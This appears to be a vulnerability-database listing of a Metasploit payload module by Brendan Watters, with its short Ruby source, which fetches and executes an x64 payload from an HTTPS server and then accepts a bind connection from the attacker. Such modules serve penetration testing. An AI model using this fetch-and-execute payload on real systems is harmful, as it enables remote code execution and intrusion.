Lucene search

K
metasploitBrendan Watters, bwatters-r7MSF:PAYLOAD-CMD-LINUX-HTTPS-X64-PINGBACK_BIND_TCP-
HistoryMay 18, 2023 - 3:47 p.m.

HTTPS Fetch, Linux x64 Pingback, Bind TCP Inline

2023-05-1815:47:29
Brendan Watters, bwatters-r7
www.rapid7.com
103
metasploit
fetch
execute
https
server
x64
payload
linux
brendan watters

Fetch and execute an x64 payload from an HTTPS server. Accept a connection from attacker and report UUID (Linux x64)

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule
  include Msf::Payload::Adapter::Fetch::Https
  include Msf::Payload::Adapter::Fetch::LinuxOptions

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'HTTPS Fetch',
        'Description' => 'Fetch and execute an x64 payload from an HTTPS server.',
        'Author' => 'Brendan Watters',
        'Platform' => 'linux',
        'Arch' => ARCH_CMD,
        'License' => MSF_LICENSE,
        'AdaptedArch' => ARCH_X64,
        'AdaptedPlatform' => 'linux'
      )
    )
  end
end